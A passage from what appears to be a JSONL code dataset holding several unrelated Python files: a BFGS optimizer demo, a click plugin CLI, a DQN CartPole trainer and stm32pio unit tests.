Filenames:\", all_files)\n","repo_name":"LogicDecode/python-projects-for-beginners","sub_path":"4 - Bulk Rename Files.py","file_name":"4 - Bulk Rename Files.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70156543161","text":"from numpy import *\n\n\n# fun\ndef fun(x):\n return 100 * (x[0, 0] ** 2 - x[1, 0]) ** 2 + (x[0, 0] - 1) ** 2\n\n\n# gfun\ndef gfun(x):\n result = zeros((2, 1))\n result[0, 0] = 400 * x[0, 0] * (x[0, 0] ** 2 - x[1, 0]) + 2 * (x[0, 0] - 1)\n result[1, 0] = -200 * (x[0, 0] ** 2 - x[1, 0])\n return result\n\n\ndef bfgs(fun, gfun, x0):\n result = []\n maxk = 500\n rho = 0.55\n sigma = 0.4\n m = shape(x0)[0]\n Bk = eye(m)\n k = 0\n while (k < maxk):\n gk = mat(gfun(x0)) # 计算梯度\n dk = mat(-linalg.solve(Bk, gk))\n m = 0\n mk = 0\n while (m < 20):\n newf = fun(x0 + rho ** m * dk)\n oldf = fun(x0)\n if (newf < oldf + sigma * (rho ** m) * (gk.T * dk)[0, 0]):\n mk = m\n break\n m = m + 1\n\n # BFGS校正\n x = x0 + rho ** mk * dk\n sk = x - x0\n yk = gfun(x) - gk\n if (yk.T * sk > 0):\n Bk = Bk - (Bk * sk * sk.T * Bk) / (sk.T * Bk * sk) + (yk * yk.T) / (yk.T * sk)\n\n k = k + 1\n x0 = x\n result.append(fun(x0))\n\n return result\n\n\nimport matplotlib.pyplot as plt\n\nx0 = mat([[-1.2], [1]])\nresult = bfgs(fun, gfun, x0)\n\nn = len(result)\nax = plt.figure().add_subplot(111)\nx = arange(0, n, 1)\ny = result\nax.plot(x, y)\n\nplt.show()","repo_name":"Baylor96/Python","sub_path":"Numpy and Pandas package/BFGS.py","file_name":"BFGS.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"16965424736","text":"import click\nimport os\nfrom mymodule import mkdirs\n\nplugin_folder = os.path.join(os.path.dirname(__file__), 'plugins')\nmkdirs(plugin_folder)\n\ndef list_plugins(rv=[]):\n for filename in os.listdir(plugin_folder):\n if filename.endswith('.py'):\n temp = filename[:-3]\n if temp not in rv:\n rv.append(temp)\n return rv\n\nclass MyCLI(click.MultiCommand):\n \"\"\"\n lazy load of sub commands from commands folder. \n \"\"\"\n commandList = {}\n def list_commands(self, ctx):\n rv = list(self.commandList.keys())\n rv = list_plugins(rv)\n rv.sort()\n return rv\n\n def get_command(self, ctx, name):\n if name in self.commandList:\n return self.commandList[name]\n fn = os.path.join(plugin_folder, name + '.py')\n ns = {'__file__':fn}\n if os.path.isfile(fn):\n with open(fn) as f:\n # code = compile(f.read(), fn, 'exec')\n exec(f.read(), ns, ns)\n return ns['cli']\n else:\n return None\n\n def add_command(self,f):\n self.commandList[f.__name__] = f\n\n def add_command(self, cmd, name=None):\n \"\"\"Registers another :class:`Command` with this group. If the name\n is not provided, the name of the command is used.\n \"\"\"\n name = name or cmd.name\n if name is None:\n raise TypeError(\"Command has no name.\")\n if name in self.list_commands(1):\n raise RuntimeError(f'Command {name} already exist.')\n self.commandList[name] = cmd\n\n def command(self, *args, **kwargs):\n \"\"\"A shortcut decorator for declaring and attaching a command to\n the group. This takes the same arguments as :func:`command` but\n immediately registers the created command with this instance by\n calling into :meth:`add_command`.\n \"\"\"\n command = click.command\n\n def decorator(f):\n cmd = command(*args, **kwargs)(f)\n self.add_command(cmd)\n return cmd\n return decorator\n\n\n@click.group(cls=MyCLI)\ndef _plugins():\n pass \n\n\n@_plugins.command()\n@click.option('--show-folder',\"-sf\",default=False, is_flag=True,help=\"Open plugins folder.\")\n@click.option('--install',\"-i\",\"file\",default=None,type=click.Path(exists=True,dir_okay=False), help=\"Install to plugins folder.\") #\n@click.pass_context\ndef plugins(ctx,show_folder,file):\n \"\"\"\n Manage plugins. Show folder or install plugin.\n Call directly will show a list of all currently available plugins.\n \"\"\"\n if show_folder:\n import subprocess\n click.echo(f\"Plugins stored in: {plugin_folder}\")\n subprocess.run(f\"cd {plugin_folder}\\nopen .\\n\",shell=True)\n return \n if file:\n from shutil import copyfile\n from cli.ok import menu\n cmds = menu.list_commands(ctx)\n click.echo(f\"Current commands: {cmds}\")\n name=click.prompt(\"Enter a different name for your plugin\")\n if name in cmds:\n click.echo(f'!Failed. <{name}> is alread in use.')\n ctx.exit()\n copyfile(file,os.path.join(plugin_folder,f\"{name}.py\"))\n click.echo(f\"Command <{name}> installed to plugins folder.\")\n return\n\n # display installed plugin list \n rv = list_plugins()\n click.echo(f'Currently installed plugins: {rv}')","repo_name":"rocksnow1942/mymodule","sub_path":"cli/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"64329518","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\nfrom PIL import Image\nimport os,time\n\nimport torch\nfrom torch import mode\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom IPython import display\n\n# 游戏有设置最大步数 200/env._max_episode_steps 步\n# unwarpped类是解除这个限制,玩多少步都可以\nenv = gym.make('CartPole-v0').unwrapped\n\n# 随机玩一局\n# env.step(0): 小车向左, env.step(1): 小车向右\n# env.reset()\n# for t in count(): \n# env.render()\n# leftOrRight = random.randrange(env.action_space.n)\n# _, reward, done, _ = env.step(leftOrRight)\n# if done:\n# break\n\n\nenv.reset()\n\n\n# plt.ion()\n\n# if gpu is to be used\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"device:\", device)\n\n# 状态、动作、下一个状态、打分\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\n# 定长的数组,自动按self.position循环更新数据\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def calc(self):\n reward = 0.0 \n for t in self.memory:\n if t.next_state!=None:\n reward += 1\n return reward/self.capacity\n\n def __len__(self):\n return len(self.memory)\n\nclass DQN(nn.Module):\n\n def __init__(self, h, w, outputs):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv4 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv5 = nn.Conv2d(32, 1, kernel_size=1, stride=1)\n self.head = nn.Linear(600, outputs)\n\n # 使用一个元素调用以确定下一个操作,或在优化期间调用batch。返回tensor([[left0exp,right0exp]...]).\n def forward(self, x):\n x = F.relu(self.conv1(x)) #[B, 3, 40, 90] => [B, 16, 18, 43]\n x = F.relu(self.conv2(x)) #[B, 16, 18, 43] => [B, 32, 7, 20]\n x = F.relu(self.conv3(x)) #[B, 32, 7, 20] => [B, 64, 3, 9]\n x = F.relu(self.conv4(x)) #[B, 64, 3, 9] => [B, 128, 1, 1]\n x = F.relu(self.conv5(x)) \n x = x.view(x.size(0), -1)\n return self.head(x) #[B, 128] => [B, 2]\n\nresize = T.Compose([T.ToPILImage(),\n T.Grayscale(num_output_channels=1),\n T.Resize(20),\n T.ToTensor(),\n T.Normalize(mean=(0.5,),std=(0.5,))])\ndef get_screen():\n screen = env.render(mode='rgb_array')\n return resize(screen).to(device)\n\nenv.reset()\n# plt.figure()\n# plt.imshow(get_screen().cpu().squeeze().numpy())\n# plt.title('Example extracted screen')\n# plt.show()\n\nBATCH_SIZE = 512\n# 得分的权重,这个值越小,越容易快速将得分压制到 1/(1-GAMMA) ,但同时最长远步骤的影响力也就越小,不能压制的太小\n# 得分压制的太小会导致 Loss 过小,MSE的梯度会变得很小,不容易学习\nGAMMA = 0.9\n\nEPS_START = 0.9\nEPS_END = 0.05\nEPS_DECAY = 1000000.\nTARGET_UPDATE = 10\nMODEL_File = 'data/save/14_checkpoint.tar'\n\n\n# 获取屏幕大小,以便我们可以根据AI gym返回的形状正确初始化图层。 \n# 此时的典型尺寸接近3x40x90\n# 这是get_screen()中的限幅和缩小渲染缓冲区的结果\ninit_screen = get_screen()\n_, screen_height, screen_width = init_screen.shape #【C,H,W】\n\n# 从gym行动空间中获取行动数量 , 就两种,左或右\nn_actions = env.action_space.n\n\n# 训练网络\npolicy_net = DQN(screen_height, screen_width, n_actions).to(device)\n\nprint(policy_net)\n\n# 预测网络,相对于 policy_net 是上一次的训练参数\n\nmemory = ReplayMemory(100000)\n\n# 总共训练步数\nsteps_done = 0\n# 全随机大概平均一局步数\navg_step = 20\nif os.path.exists(MODEL_File):\n checkpoint = torch.load(MODEL_File, map_location=device)\n policy_net_sd = checkpoint['policy_net']\n steps_done = checkpoint['steps_done']\n avg_step = checkpoint['avg_step']\n policy_net.load_state_dict(policy_net_sd)\n\n# 开始随机动作,后期逐渐采用预测动作 【0.05 --> 0.9】返回动作shape: [B, 1]\nnet_actions_count=torch.tensor([0,0], device=device, dtype=torch.long)\ndef select_action(state):\n global steps_done\n sample = random.random()\n eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n math.exp(-1. * steps_done / EPS_DECAY)\n steps_done += 1\n if sample > eps_threshold:\n with torch.no_grad():\n # t.max(1)将返回每行的最大列值。 \n # 最大结果的第二列是找到最大元素的索引,因此我们选择具有较大预期奖励的行动。\n action = policy_net(state).max(1)[1].view(1, 1)\n net_actions_count[action]+=1\n return action\n else:\n return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)\n\nepisode_durations = []\n\ndef plot_durations():\n plt.figure(2)\n plt.clf()\n durations_t = torch.tensor(episode_durations, dtype=torch.float)\n plt.title('Training...')\n plt.xlabel('Episode')\n plt.ylabel('Duration')\n plt.plot(durations_t.numpy())\n # 取100个episode的平均值并绘制它们\n if len(durations_t) >= 100:\n means = durations_t.unfold(0, 100, 1).mean(1).view(-1)\n means = torch.cat((torch.zeros(99), means))\n plt.plot(means.numpy())\n\n plt.pause(0.001) # 暂停一下,以便更新图表\n\n\ndef optimize_model():\n if len(memory) < BATCH_SIZE:\n return\n # 获得 [(state, action, next_state, reward), ...]\n transitions = memory.sample(BATCH_SIZE)\n # 转置batch(有关详细说明,请参阅https://stackoverflow.com/a/19343/3343043)。\n # 这会将过渡的batch数组转换为batch数组的过渡。\n # [T(a=1,b=2),T(a=1,b=2),T(a=1,b=2)] ==> T(a=(1,1,1),b=(2,2,2)) \n batch = Transition(*zip(*transitions))\n # 计算非最终状态的掩码并连接batch元素(最终状态将是模拟结束后的状态)\n # [True,True] Shape [128]\n non_final_mask = torch.tensor(tuple(map(lambda s: s is not None,\n batch.next_state)), device=device, dtype=torch.bool)\n # [121, 3, 40, 90]\n non_final_next_states = torch.stack([s for s in batch.next_state if s is not None])\n # [128, 3, 40, 90]\n state_batch = torch.stack(batch.state)\n # [[1],[1]] Shape [128, 1]\n action_batch = torch.cat(batch.action)\n # [1, 1] Shape [128]\n reward_batch = torch.cat(batch.reward)\n \n # 计算Q(s_t,a) - 模型计算Q(s_t),然后我们选择所采取的动作列。\n # 这些是根据policy_net对每个batch状态采取的操作\n # 根据当前的动作获得当前动作对应的得分 \n # [[6.2464],[3.2442]] shape [128,1]\n state_action_values = policy_net(state_batch).gather(1, action_batch)\n # 计算所有下一个状态的V(s_{t+1})\n # non_final_next_states的操作的预期值是基于“较旧的”target_net计算的; \n # 因为涉及到模型BatchNorm2d的参数,需要采用eval(),而当前模型 policy_net 又处理train()状态,所以只能另外开一个 target_net 来计算\n # 用 max(1)[0] 选择一下个状态最佳得分。这是基于掩码合并的,这样我们就可以得到预期的得分,或者在状态是最终的情况下为0。\n # 预测下一个状态的最佳得分,如果没有下一步,则下一步的概率为0 ,shape : 121\n next_state_values = torch.zeros(BATCH_SIZE, device=device)\n # [6.4941, 0.0000] Shape [128]\n with torch.no_grad():\n next_state_values[non_final_mask] = policy_net(non_final_next_states).max(1)[0]\n # 用预期的下一步的最佳得分*衰减,再加上本次的奖励获得总得分\n # [6.8447, 0] Shape [128]\n expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n # 计算Huber损失\n # 期望当前状态得分和下一次状态得分一样,这样,如果下一次状态得分高,则鼓励当前动作,否则压制当前动作\n # 为了最大限度地降低此错误,我们将使用Huber损失。当误差很小时,Huber损失就像均方误差一样,\n # 但是当误差很大时,就像平均绝对误差一样 - 当估计噪声很多时,这使得它对异常值更加鲁棒。\n # 在 [-1, 1] 区间,直接采用MSE: 1/2*(y-f(x))^2,其余采用L1Loss: |y-f(x)| \n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n\n # 优化模型\n optimizer.zero_grad()\n loss.backward()\n for param in policy_net.parameters():\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n return loss\n\n# 将学习率调到很小 RMSprop 貌似学不出来\noptimizer = optim.Adam(policy_net.parameters(),lr=1e-4)\n# optimizer = optim.RMSprop(policy_net.parameters(),lr=1e-5)\n\nnum_episodes = 5000000\nstep_episode_update = 0.\nstate = torch.zeros((3, 20, 30)).to(device) \nfor i_episode in range(num_episodes):\n # 初始化环境和状态\n env.reset()\n state[2] = get_screen()\n # last_screen = get_screen() # [1, 3, 40, 60]\n # current_screen = get_screen() # [1, 3, 40, 60]\n # state = current_screen - last_screen # [1, 3, 40, 60] \n # reward_proportion = memory.calc() \n avg_loss = 0.\n for t in count():\n # 选择动作并执行\n action = select_action(state.unsqueeze(0))\n action_value = action.item()\n\n observation_, _reward, done, _ = env.step(action_value)\n\n # 只能对步骤给予奖励,对结果进行惩罚 \n if done:\n _reward = -1.0\n else:\n # 前面的动作对后续的影响更大,所以前面的奖励变大\n _reward = math.exp(-1. * t / avg_step) \n\n # 这种奖励就明显的引入了规则,看作作弊了\n # x, x_dot, theta, theta_dot = observation_ \n # # r1代表车的 x水平位移 与 x最大边距 的距离差的得分\n # r1 = math.exp((env.x_threshold - abs(x))/env.x_threshold) - math.exp(1)/2\n # # r2代表棒子的 theta离垂直的角度 与 theta最大角度 的差的得分\n # r2 = math.exp((env.theta_threshold_radians - abs(theta))/env.theta_threshold_radians) - math.exp(1)/2\n # # 总 reward 是 r1 和 r2 的结合, 既考虑位置, 也考虑角度。\n # _reward = r1 + r2 \n\n reward = torch.tensor([_reward], device=device)\n\n # 观察新的状态,下一个状态 等于当前屏幕 - 上一个屏幕 ? 这样抗干扰高?所有的状态预测都是像素差\n current_screen = get_screen()\n if not done:\n next_state = torch.zeros((3, 20, 30)).to(device) \n next_state[0] = state[1]\n next_state[1] = state[2]\n next_state[2] = current_screen \n else:\n next_state = None\n\n # 强化学习的采样直接按正常采样\n memory.push(state, action, next_state, reward)\n\n # 执行优化的一个步骤(在目标网络上)\n loss = optimize_model()\n\n if loss!=None: \n avg_loss += loss.item() \n\n if next_state == None:\n state = torch.zeros((3, 20, 30)).to(device)\n else:\n state = next_state\n\n if done or t>=1000:\n # episode_durations.append(t + 1)\n # plot_durations()\n break\n\n step_episode_update += t\n \n # 根据 loss 动态调整GAMMA,加快数据收敛\n avg_loss = avg_loss / t\n # if avg_loss>1: \n # GAMMA = GAMMA * 0.999\n # elif avg_loss<0.01:\n # GAMMA = min(GAMMA * 1.001, 0.999) \n\n # 更新目标网络,复制DQN中的所有权重和偏差\n if i_episode % TARGET_UPDATE == 0 and loss!=None :\n net_actions_count_value = net_actions_count.cpu().numpy()\n avg_step = avg_step*0.99 + step_episode_update/TARGET_UPDATE*0.01 \n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()),\\\n i_episode, steps_done, \"%.2f/%.2f\"%(step_episode_update/TARGET_UPDATE, avg_step), \\\n \"loss:\", avg_loss, \\\n \"action_random: %.2f\"%(EPS_END + (EPS_START - EPS_END) * math.exp(-1. * steps_done / EPS_DECAY)), \\\n \"action:\", net_actions_count_value/sum(net_actions_count_value), \"GAMMA:\", GAMMA )\n step_episode_update = 0.\n\n if i_episode % 1000 == 0:\n torch.save({ 'policy_net': policy_net.state_dict(),\n 'steps_done': steps_done,\n 'avg_step': avg_step,\n }, MODEL_File+\"_\"+str(steps_done))\n else:\n torch.save({ 'policy_net': policy_net.state_dict(),\n 'steps_done': steps_done,\n 'avg_step': avg_step,\n }, MODEL_File)\n\nprint('Complete')\nenv.render()\nenv.close()\nplt.ioff()\nplt.show()","repo_name":"one-leaf/pytorch","sub_path":"04/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":13587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22660329514","text":"import collections.abc\nimport configparser\nimport contextlib\nimport io\nimport logging\nimport platform\nimport string\nimport subprocess\nimport time\nimport unittest.mock\n\nfrom functools import reduce\nfrom typing import Mapping, Union\n\n# Provides test constants and definitions\nimport stm32pio.core.pio\nfrom tests.common import *\n\nimport stm32pio.core.settings\nimport stm32pio.core.project\nimport stm32pio.core.cubemx\nimport stm32pio.core.util\n\n\nclass TestUnit(CustomTestCase):\n \"\"\"\n Test the single method. As we at some point decided to use a class instead of the set of scattered functions we need\n to do some preparations for almost every test (e.g. instantiate the class, create the PlatformIO project, etc.),\n though, so the architecture now is way less modular\n \"\"\"\n\n def test_generate_code(self):\n \"\"\"\n Check whether files and folders have been created (by STM32CubeMX)\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n project.generate_code()\n\n # Assuming that the presence of these files indicating a success\n files_should_be_present = ['Src/main.c', 'Inc/main.h']\n for file in files_should_be_present:\n with self.subTest(msg=f\"{file} hasn't been created\"):\n self.assertEqual(STAGE_PATH.joinpath(file).is_file(), True)\n\n def test_pio_init(self):\n \"\"\"\n Consider that the existence of a 'platformio.ini' file showing a successful PlatformIO project initialization.\n There are other artifacts that can be checked too but we are interested only in a 'platformio.ini' anyway. Also,\n check that it is a correct configparser.ConfigParser file and is not empty\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n result = project.pio_init()\n\n self.assertEqual(result, 0, msg=\"Non-zero return code\")\n self.assertTrue(STAGE_PATH.joinpath('platformio.ini').is_file(), msg=\"platformio.ini is not there\")\n\n platformio_ini = configparser.ConfigParser(interpolation=None)\n self.assertGreater(len(platformio_ini.read(STAGE_PATH.joinpath('platformio.ini'))), 0,\n msg='platformio.ini is empty')\n\n def test_patch(self):\n \"\"\"\n Check that the new parameters have been added, modified ones have been updated and existing parameters didn't\n gone. Also, check for unnecessary folders deletion\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n header = inspect.cleandoc('''\n ; This is a test config .ini file\n ; with a comment. It emulates a real\n ; platformio.ini file\n ''') + '\\n'\n test_content = header + inspect.cleandoc('''\n [platformio]\n include_dir = this s;789hould be replaced\n let's add some tricky content\n ; there should appear a new parameter\n test_key3 = this should be preserved\n alright?\n\n [test_section]\n test_key1 = test_value1\n test_key2 = 123\n ''') + '\\n'\n STAGE_PATH.joinpath('platformio.ini').write_text(test_content)\n STAGE_PATH.joinpath('include').mkdir()\n\n project.patch()\n\n with self.subTest():\n self.assertFalse(STAGE_PATH.joinpath('include').is_dir(), msg=\"'include' has not been deleted\")\n\n original_test_config = configparser.ConfigParser(interpolation=None)\n original_test_config.read_string(test_content)\n\n patched_config = configparser.ConfigParser(interpolation=None)\n patch_config = configparser.ConfigParser(interpolation=None)\n patch_config.read_string(project.config.get('project', 'platformio_ini_patch_content'))\n\n patched_content = STAGE_PATH.joinpath('platformio.ini').read_text()\n patched_config.read_string(patched_content)\n self.assertGreater(len(patched_content), 0)\n\n for patch_section in patch_config.sections():\n self.assertTrue(patched_config.has_section(patch_section), msg=f\"{patch_section} is missing\")\n for patch_key, patch_value in patch_config.items(patch_section):\n self.assertEqual(patched_config.get(patch_section, patch_key, fallback=None), patch_value,\n msg=f\"{patch_section}: {patch_key}={patch_value} is missing or incorrect in the \"\n \"patched config\")\n\n for original_section in original_test_config.sections():\n self.assertTrue(patched_config.has_section(original_section),\n msg=f\"{original_section} from the original config is missing\")\n for original_key, original_value in original_test_config.items(original_section):\n # We've already checked patch parameters so skip them\n if not patch_config.has_option(original_section, original_key):\n self.assertEqual(patched_config.get(original_section, original_key), original_value,\n msg=f\"{original_section}: {original_key}={original_value} is corrupted\")\n\n self.assertIn(header, patched_content, msg='Header should be preserved')\n\n def test_build_should_handle_error(self):\n \"\"\"\n Build an empty project so PlatformIO should return an error\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n project.pio_init()\n\n with self.assertLogs(level='ERROR') as logs:\n self.assertNotEqual(project.build(), 0, msg=\"Build error was not indicated\")\n # next() - Technique to find something in array, string, etc. (or to indicate that there is no of such)\n self.assertTrue(next((True for item in logs.output if \"PlatformIO build error\" in item), False),\n msg=\"Error message does not match\")\n\n def test_start_editor(self):\n \"\"\"\n Call the editors. Use subprocess shell=True as it works on all OSes\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n editors = { # some editors to check\n 'atom': {\n 'Windows': 'atom.exe',\n 'Darwin': 'Atom',\n 'Linux': 'atom'\n },\n 'code': {\n 'Windows': 'Code.exe',\n 'Darwin': 'Visual Studio Code',\n 'Linux': 'code'\n },\n 'subl': {\n 'Windows': 'sublime_text.exe',\n 'Darwin': 'Sublime',\n 'Linux': 'sublime'\n }\n }\n\n # Look for the command presence in the system so we test only installed editors\n if platform.system() == 'Windows':\n command_template = string.Template(\"where $editor /q\")\n else:\n command_template = string.Template(\"command -v $editor\")\n\n for editor, editor_process_names in editors.items():\n if subprocess.run(command_template.substitute(editor=editor), shell=True).returncode == 0:\n editor_exists = True\n else:\n editor_exists = False\n\n if editor_exists:\n with self.subTest(command=editor, name=editor_process_names[platform.system()]):\n project.start_editor(editor)\n\n time.sleep(1) # wait a little bit for app to start\n\n if platform.system() == 'Windows':\n command_arr = ['wmic', 'process', 'get', 'description']\n else:\n command_arr = ['ps', '-A']\n # \"encoding='utf-8'\" is for \"a bytes-like object is required, not 'str'\" in \"assertIn\"\n result = subprocess.run(command_arr, stdout=subprocess.PIPE, encoding='utf-8')\n # TODO: or, for Python 3.7 and above:\n # result = subprocess.run(command_arr, capture_output=True, encoding='utf-8')\n self.assertIn(editor_process_names[platform.system()], result.stdout)\n\n def test_init_path_not_found_should_raise(self):\n \"\"\"\n Pass a non-existing path and expect the error\n \"\"\"\n path_does_not_exist_name = 'does_not_exist'\n\n path_does_not_exist = STAGE_PATH.joinpath(path_does_not_exist_name)\n with self.assertRaisesRegex(FileNotFoundError, path_does_not_exist_name,\n msg=\"FileNotFoundError has not been raised or doesn't contain a description\"):\n stm32pio.core.project.Stm32pio(path_does_not_exist)\n\n def test_save_config(self):\n \"\"\"\n Explicitly save the config to a file and look did that actually happen and whether all the information was\n preserved\n \"\"\"\n # 'board' is non-default, 'project'-section parameter\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n\n # Merge additional parameters\n retcode = project.save_config({\n 'project': {\n 'additional_test_key': 'test_value'\n }\n })\n\n self.assertEqual(retcode, 0, msg=\"Return code of the method is non-zero\")\n self.assertTrue(STAGE_PATH.joinpath(stm32pio.core.settings.config_file_name).is_file(),\n msg=f\"{stm32pio.core.settings.config_file_name} file hasn't been created\")\n\n config = configparser.ConfigParser(interpolation=None)\n self.assertGreater(len(config.read(STAGE_PATH.joinpath(stm32pio.core.settings.config_file_name))), 0,\n msg=\"Config is empty\")\n for section, parameters in stm32pio.core.settings.config_default.items():\n for option, value in parameters.items():\n with self.subTest(section=section, option=option,\n msg=\"Section/key is not found in the saved config file\"):\n self.assertNotEqual(config.get(section, option, fallback=\"Not found\"), \"Not found\")\n\n self.assertEqual(config.get('project', 'board', fallback=\"Not found\"), PROJECT_BOARD,\n msg=\"'board' has not been set\")\n self.assertEqual(config.get('project', 'additional_test_key', fallback=\"Not found\"), 'test_value',\n msg=\"Merged config is not present in the saved file\")\n\n def test_get_platformio_boards(self):\n \"\"\"\n PlatformIO identifiers of boards are requested using PlatformIO CLI in JSON format\n \"\"\"\n boards = stm32pio.core.pio.get_boards()\n\n self.assertIsInstance(boards, collections.abc.MutableSequence)\n self.assertGreater(len(boards), 0, msg=\"boards list is empty\")\n self.assertTrue(all(isinstance(item, str) for item in boards), msg=\"some list items are not strings\")\n\n def test_ioc_file_provided(self):\n \"\"\"\n Test a correct handling of a case when the .ioc file was specified instead of the containing directory\n \"\"\"\n\n # Create multiple .ioc files\n shutil.copy(STAGE_PATH.joinpath(PROJECT_IOC_FILENAME), STAGE_PATH.joinpath('42.ioc'))\n shutil.copy(STAGE_PATH.joinpath(PROJECT_IOC_FILENAME), STAGE_PATH.joinpath('Abracadabra.ioc'))\n\n project = stm32pio.core.project.Stm32pio(STAGE_PATH.joinpath('42.ioc')) # pick just one\n self.assertTrue(project.cubemx.ioc.path.samefile(STAGE_PATH.joinpath('42.ioc')),\n msg=\"Provided .ioc file hasn't been chosen\")\n self.assertEqual(project.config.get('project', 'ioc_file'), '42.ioc',\n msg=\"Provided .ioc file is not in the config\")\n\n def test_validate_environment(self):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n with self.subTest(msg=\"Valid config\"):\n result_should_be_ok = project.validate_environment()\n self.assertTrue(result_should_be_ok.succeed, msg=\"All the tools are correct but the validation says \"\n \"otherwise\")\n\n with self.subTest(msg=\"Invalid config\"):\n project.config.set('app', 'platformio_cmd', 'this_command_doesnt_exist')\n result_should_fail = project.validate_environment()\n self.assertFalse(result_should_fail.succeed, msg=\"One tool is incorrect and the results should reflect \"\n \"this\")\n platformio_result = next((result for result in result_should_fail if result.name == 'platformio_cmd'), None)\n self.assertIsNotNone(platformio_result, msg=\"PlatformIO validation results not found\")\n self.assertFalse(platformio_result.succeed, msg=\"PlatformIO validation results should be False\")\n\n def test_inspect_ioc(self):\n with self.subTest(msg=\"Parsing an .ioc file\"):\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n self.assertSequenceEqual(config.sections(), [stm32pio.core.cubemx.IocConfig.fake_section_name],\n msg=\"Incorrect set of config sections\", seq_type=list)\n self.assertGreater(len(config[config.fake_section_name].keys()), 10, msg=\"There should be a lot of keys\")\n\n with self.subTest(msg=\"Inspecting a proper config\"):\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n with contextlib.redirect_stderr(io.StringIO()) as logs:\n config.inspect(PROJECT_BOARD)\n self.assertEqual(logs.getvalue(), '', msg=\"Correctly set config shouldn't produce any warnings\")\n\n with self.subTest(msg=\"Inspecting an invalid config\"):\n invalid_content = inspect.cleandoc('''\n board=SOME-BOARD-123\n # board is wrong and no other parameters at all\n ''') + '\\n'\n invalid_ioc = STAGE_PATH / 'invalid.ioc'\n invalid_ioc.write_text(invalid_content)\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, 'invalid.ioc', logger=logging.getLogger('any'))\n with self.assertLogs(logger='any', level=logging.WARNING) as logs:\n config.inspect(PROJECT_BOARD)\n self.assertEqual(len(logs.records), 4, msg=\"There should be 4 warning log messages\")\n\n with self.subTest(msg=\"Custom board with unmatched MCUs\"):\n ioc_content = inspect.cleandoc('''\n board=custom\n ProjectManager.DeviceId=some_wrong_mcu\n ''') + '\\n'\n invalid_ioc = STAGE_PATH / 'invalid.ioc'\n invalid_ioc.write_text(ioc_content)\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, 'invalid.ioc', logger=logging.getLogger('any'))\n with self.assertLogs(logger='any', level=logging.WARNING) as logs:\n config.inspect(PROJECT_BOARD, 'STM32F031K6T6')\n self.assertTrue(any('MCU' in line for line in logs.output), msg=\"No mention of mismatched MCUs\")\n\n with self.subTest(msg=\"Saving the config back\"):\n ioc_file = STAGE_PATH / PROJECT_IOC_FILENAME\n initial_content = ioc_file.read_text()\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n\n config.save()\n self.assertEqual(ioc_file.read_text(), initial_content, msg=\"Configs should be identical\")\n\n changed_board = \"INTEL-8086\"\n config[config.fake_section_name]['board'] = changed_board\n config.save()\n self.assertIn(f'board={changed_board}', ioc_file.read_text(), msg=\"Edited parameters weren't preserved\")\n\n def test_clean(self):\n def plant_fs_tree(path: Path, tree: Mapping[str, Union[str, Mapping]], exist_ok: bool = True):\n for endpoint, content in tree.items():\n if isinstance(content, collections.abc.Mapping):\n (path / endpoint).mkdir(exist_ok=exist_ok)\n plant_fs_tree(path / endpoint, content, exist_ok=exist_ok)\n elif type(content) == str and len(content):\n (path / endpoint).write_text(content)\n else:\n (path / endpoint).touch()\n\n def flatten_tree(tree, root: Path = None):\n tree_paths = []\n for endpoint, content in tree.items():\n tree_paths.append(Path(endpoint) if root is None else (root / endpoint))\n if isinstance(content, collections.abc.Mapping):\n tree_paths.extend(flatten_tree(content, 